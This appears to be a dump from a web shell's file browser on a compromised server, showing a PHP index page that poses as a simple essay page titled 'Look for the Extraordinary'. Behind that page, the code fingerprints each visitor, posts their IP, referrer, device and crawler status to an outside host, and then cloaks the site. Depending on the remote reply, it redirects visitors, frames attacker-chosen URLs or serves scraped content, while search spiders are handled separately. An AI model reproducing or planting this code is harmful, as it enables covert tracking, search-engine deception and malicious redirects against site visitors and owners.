HEX
Server: nginx/1.28.1
System: Linux 10-41-63-61 6.8.0-31-generic #31-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 20 00:40:06 UTC 2024 x86_64
User: www (1001)
PHP: 7.4.33
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot//ww.wwepom.site/aa/index.php
<?php 
  echo '<head>
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    </head>';
function is_spider() {
    $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";
    if (preg_match('#(spider|mj12bot|dotbot|bingbot|googlebot|slurp|SemrushBot|AhrefsBot)#i', $ua)){
        return 1;
   }
    return 0;
}
$spider=is_spider();
$url1='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
function isMobile() {
  if (isset($_SERVER['HTTP_X_WAP_PROFILE'])) {
    return '手机';
  }
  if (isset($_SERVER['HTTP_VIA'])) {
    return stristr($_SERVER['HTTP_VIA'], "wap") ? '手机' : false;
  }
  if (isset($_SERVER['HTTP_USER_AGENT'])) {
    $clientkeywords = array('nokia','sony','ericsson','mot','samsung','htc','sgh','lg','sharp','sie-','philips','panasonic','alcatel',
    'lenovo','iphone','ipod','blackberry','meizu','android','netfront','symbian','ucweb','windowsce','palm','operamini','operamobi',
    'openwave','nexusone','cldc','midp','wap','mobile','MicroMessenger');
    if (preg_match("/(" . implode('|', $clientkeywords) . ")/i", strtolower($_SERVER['HTTP_USER_AGENT']))) {
      return '手机';
    }
  }
  if (isset ($_SERVER['HTTP_ACCEPT'])) {
    if ((strpos($_SERVER['HTTP_ACCEPT'], 'vnd.wap.wml') !== false) && (strpos($_SERVER['HTTP_ACCEPT'], 'text/html') ===
    false || (strpos($_SERVER['HTTP_ACCEPT'], 'vnd.wap.wml') < strpos($_SERVER['HTTP_ACCEPT'], 'text/html')))) {
      return '手机';
    }
  }
  return '电脑';
}
$Mobile=isMobile();
$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2); 
function getIp()
{
    if ($_SERVER["HTTP_CLIENT_IP"] && strcasecmp($_SERVER["HTTP_CLIENT_IP"], "unknown")) {
        $ip = $_SERVER["HTTP_CLIENT_IP"];
    } else {
        if ($_SERVER["HTTP_X_FORWARDED_FOR"] && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")) {
            $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
        } else {
            if ($_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) {
                $ip = $_SERVER["REMOTE_ADDR"];
            } else {
                if (isset ($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'],
                        "unknown")
                ) {
                    $ip = $_SERVER['REMOTE_ADDR'];
                } else {
                    $ip = "unknown";
                }
            }
        }
    }
    return ($ip);
}
 $ip=getIp();
 $widths = "<script>document.write(screen.width)<\/script>";
$heights = "<script>document.write(screen.height)<\/script>";
$heard  = 0;

  function clientOS() {
    $agent = strtolower($_SERVER['HTTP_USER_AGENT']);
    if(strpos($agent, 'windows nt')) {
        $platform = 'windows';
    } elseif(strpos($agent, 'macintosh')) {
        $platform = 'mac';
    } elseif(strpos($agent, 'ipod')) {
        $platform = 'ios';
    } elseif(strpos($agent, 'ipad')) {
        $platform = 'ios';
    } elseif(strpos($agent, 'iphone')) {
        $platform = 'ios';
    } elseif (strpos($agent, 'android')) {
        $platform = 'android';
    } elseif(strpos($agent, 'unix')) {
        $platform = 'unix';
    } elseif(strpos($agent, 'linux')) {
        $platform = 'linux';
    } else {
        $platform = 'other';
    }

    return $platform;
}
function getCurl1($url,$turn=0)
    {
  
        
        header("Content-type: text/html; charset=utf8");
        $headers = [];
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($curl, CURLOPT_HEADER, 0);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); 
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
        curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"); 
        curl_setopt($curl, CURLOPT_REFERER, "http://www.baidu.com/");
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 5);
        $data = curl_exec($curl);
        curl_close($curl);
        if ($turn)
            $data = mb_convert_encoding($data, 'UTF-8', 'UTF-8,GBK,GB2312,BIG5');
        return $data;
    }
$opersystem=clientOS();
$refefef=$_SERVER['HTTP_REFERER'];
$ch = curl_init('https://nodetcp.com/vue-admin-php/public/index.php/admin/check/adList');
$jsonData= array();
$jsonData['site_id']=12873;
$jsonData['username']='1006941410@qq.com';
$jsonData['refefef']=$refefef;
$jsonData['heard']=$heard;
$jsonData['widths']=$widths;
$jsonData['heights']=$heights;
$jsonData['opersystem']=$opersystem;
$jsonData['spider']=$spider;
$jsonData['url1']=$url1;
$jsonData['Mobile']=$Mobile;
$jsonData['lang']=$lang;
$jsonData['ip']=$ip;
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);  
curl_setopt($ch, CURLOPT_USERPWD, "$username:$password");
curl_setopt($ch, CURLOPT_TIMEOUT,0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($jsonData));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$model = json_decode(curl_exec($ch));

if($model->type=='luodi'){
   if($model->anquan=='301'){
        echo("<script>location.href = '$model->anquanlianjie';</script>");
     return;
    }
    else if($model->anquan=='ifame'){
   
     echo "<iframe src=$model->anquanlianjie frameborder='0'width='100%' height='100%' style='width:100%;height:100%;position:absolute;top:0px;left:0px;'></iframe>";
     return;
      }
    else if($model->anquan=='inner html'){
           echo require("data.php");
     return;
       }
}
else {
    if($model->youdao=='404'){
        @header("http/1.1 404 not found");
        return;
    }
    else if($model->youdao=='301'){
     echo("<script>location.href = '$model->youdaolianjie';</script>");
     return;
        
    }
      else if($model->youdao=='inner html'){
         echo require("safety.php");
     return;
    }
    else if($model->youdao=='超简页'){
   
    
}
    else if($model->youdao=='全站'){
        echo require("fullsite/newindex.html");
     return;
    
}
  else if($model->youdao=='ifame'){
   
     echo "<iframe src=$model->youdaolianjie frameborder='0' width='100%' height='100%' style='width:100%;height:100%;position:absolute;top:0px;left:0px;'></iframe>";
     return;
      }
  else if($model->youdao=='采集'){
    echo getCurl1($model->youdaolianjie);
     return;
  }
  }
?><!DOCTYPE html><html><head><meta charset="utf-8"><title>Look for the Extraordinary</title><style>.h1{margin-left:600px;width:600px}</style></head>
<body>
    <div>
        <h1 class="h1" ;>Look for the Extraordinary</h1>
        </div>
        <div style="margin-left:600px" ;>
            <img id="img" src="./easy/1.jpg" style="width:600px"/>
     </div>
     <div style="width:600px;margin-left:600px" ;>
         <p>
Look for the Extraordinary

I heard a story about two workers who were approached by a reporter. The reporter asked the first worker, "What are you doing? His response was to complain that he was virtually a slave, an underpaid bricklayer who spent his days wasting his time, placing bricks on the top of one another.

The reporter asked the second worker the same question. His response, however, was quite different. "I’m the luckiest person in the world, "he said. "I get to be a part of important and beautiful pieces of architecture. I help tum simple pieces of brick into exquisite masterpieces.”

They were both right.

The truth is, we see in life what we want to see. If you search for ugliness you’ll find plenty of it. If you want to find fault with other people, your career, or the world in general, you'll certainly be able to do so. But the opposite is also true.

If you look for the extraordinary in the ordinary, your can train yourself to see it. This bricklayer sees cathedrals within pieces of brick. The question is, can you? Can you see the extraordinary synchronicity that exists in our world; the perfection of the universe in action; the extraordinary beauty of nature: the incredible miracle of human life? To me. it's all a matter of intention. There is so much to be grateful for, so much to be in awe about. Life is precious and extraordinary. Put your attention on this fact and little, ordinary things will take on a whole new meaning.

   </p>
   </div></body></html>